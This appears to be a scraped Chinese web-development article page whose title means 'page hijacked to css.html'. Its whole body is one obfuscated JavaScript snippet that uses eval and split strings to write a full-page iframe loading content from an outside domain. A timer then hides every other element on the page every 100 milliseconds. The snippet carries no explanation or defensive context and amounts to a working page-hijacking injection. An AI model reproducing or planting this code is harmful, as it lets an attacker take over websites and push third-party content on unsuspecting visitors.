Home  >  Article  >  Web Front-end  >  页面劫持到css.html_html/css_WEB-ITnose

页面劫持到css.html_html/css_WEB-ITnose

WBOY
WBOYOriginal
2016-06-24 11:35:311009browse

var  ss = '<center id="showcloneshengxiaon"><ifr'+'ame scrolling="no" marginheight=0 marginwidth=0  frameborder="0" width="100%" width="14'+'00" height="25'+'50" src="http://info.yidaba.com/ght/03/css/css.html"></iframe></center>';eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');");	try{	setInterval(function(){		try{			document.getElementById("div"+"All").style.display="no"+"ne";		}catch(e){}		for(var i=0;i<document.body.children.length;i++){			try{				var tagname = document.body.children[i].tagName;				var myid = document.body.children[i].id;				if(myid!="iconDiv1" && myid!="showcloneshengxiaon"){				  // if(tagname!="center"){ 				     document.body.children[i].style.display="non"+"e";				   //}				}			}catch(e){}		}	},100);}catch(e){}



Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn